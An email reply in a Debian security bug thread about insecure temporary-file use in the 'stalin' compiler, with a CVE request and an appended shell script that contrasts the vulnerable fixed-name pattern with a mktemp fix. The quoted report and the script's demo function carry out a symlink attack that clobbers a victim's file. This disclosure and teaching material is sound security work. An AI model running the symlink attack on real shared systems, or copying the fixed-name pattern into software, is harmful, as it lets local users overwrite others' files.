Hi Steve,

On Tue, Dec 22, 2015 at 10:38:54AM +0000, Steve Kemp wrote:
>
> Package: stalin
> Version: 0.11-5
> Severity: critical
> Tags: security
>
> When `stalin` launches it attempts to detect its environment via
> the following code in /usr/lib/stalin/QobiScheme.sc:
>
>     (system "uname -m >/tmp/QobiScheme.tmp")
>     ...
>     (system "rm -f /tmp/QobiScheme.tmp"))
>
> This is a prime example of the insecure use of temporary files,
> and allows overwriting any file owned by the user who invokes
> stalin.
>
> Trivial demonstration:
>
>     $ ln -s /home/steve/HACK /tmp/QobiScheme.tmp
>     $ ls -l /home/steve/HACK
>     ls: cannot access /home/steve/HACK: No such file or directory
>
> Now run the sample code:
>
>     $ cd /tmp/stalin-0.11/benchmarks
>     $ ./make-hello
>
> And we see this:
>
>     $ ls -l /home/steve/HACK
>     -rw-r--r-- 1 steve steve 6 Dec 22 08:30 /home/steve/HACK
I have requested a CVE here:

http://www.openwall.com/lists/oss-security/2015/12/27/1

I think the severity though can be downgraded (unless I miss something),
since on default Debian GNU/Linux installations Linux has
fs.protected_symlinks=1, which mitigates the attack vector.

Regards,
Salvatore
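The following script is an added example, not code from the stalin package or from either message above. It reproduces the fixed-name temporary file pattern quoted from QobiScheme.sc beside a mktemp-based replacement, and reads the fs.protected_symlinks sysctl that the reply relies on. The function names (vulnerable_detect, safe_detect, demo_vulnerable, demo_safe, protected_symlinks) are this example's own, and every path it touches lives under a private directory created with mktemp -d, standing in for /tmp and /home/steve/HACK. One caveat worth keeping in mind when running it: protected_symlinks only refuses to follow a symlink in a world-writable sticky directory when the symlink's owner differs from both the follower and the directory owner, so a same-user demonstration like the one in the report still succeeds with the sysctl set to 1; the mitigation is against a symlink planted by a different local user in /tmp.

```shell
#!/bin/sh
# Added example for the stalin temp-file report. Not part of the package or the thread.
# Everything runs in a throwaway directory from mktemp -d; no real /tmp path is touched.

# Mirrors the quoted QobiScheme.sc sequence: redirect into a fixed, predictable name,
# then "rm -f" it. If a symlink already sits at that name, the redirect follows it and
# creates or truncates the symlink's target; rm -f afterwards removes only the symlink.
vulnerable_detect() {
    tmp="$1/QobiScheme.tmp"        # predictable: anyone who can write $1 may pre-plant it
    uname -m >"$tmp"
    rc=$?
    rm -f "$tmp"
    return $rc
}

# Hardened variant: mktemp creates a new file atomically (O_CREAT|O_EXCL, mode 0600) under
# an unpredictable name, so a planted symlink at a guessable path is never opened.
safe_detect() {
    tmp=$(mktemp "$1/QobiScheme.XXXXXX") || return 1
    uname -m >"$tmp"
    cat "$tmp"                     # the "detected environment" string, e.g. x86_64
    rm -f "$tmp"
}

# Attacker step from the report: plant a symlink at the predictable name that points at a
# file the victim owns but which does not exist yet. Prints "clobbered" if the victim's
# redirect then created that file, "intact" otherwise.
demo_vulnerable() {
    work=$(mktemp -d) || return 1
    target="$work/HACK"            # stands in for /home/steve/HACK (constructed path)
    ln -s "$target" "$work/QobiScheme.tmp"
    vulnerable_detect "$work"
    if [ -s "$target" ]; then echo clobbered; else echo intact; fi
    rm -rf "$work"
}

# Same planted symlink, but the victim uses the mktemp-based variant.
demo_safe() {
    work=$(mktemp -d) || return 1
    target="$work/HACK"
    ln -s "$target" "$work/QobiScheme.tmp"   # present, but never opened by safe_detect
    safe_detect "$work" >/dev/null
    if [ -e "$target" ]; then echo clobbered; else echo intact; fi
    rm -rf "$work"
}

# The kernel knob the reply cites. Prints its value, or "unknown" where /proc is absent.
protected_symlinks() {
    if [ -r /proc/sys/fs/protected_symlinks ]; then
        cat /proc/sys/fs/protected_symlinks
    else
        echo unknown
    fi
}

echo "fixed name (/tmp/QobiScheme.tmp pattern): $(demo_vulnerable)"
echo "mktemp-based replacement:                 $(demo_safe)"
echo "fs.protected_symlinks = $(protected_symlinks)"
```

The same fix applies inside the Scheme source: either have the `system` call run `mktemp` and use the returned name, or avoid the file altogether and read the output of `uname -m` through a pipe, which leaves nothing in /tmp for another user to pre-plant.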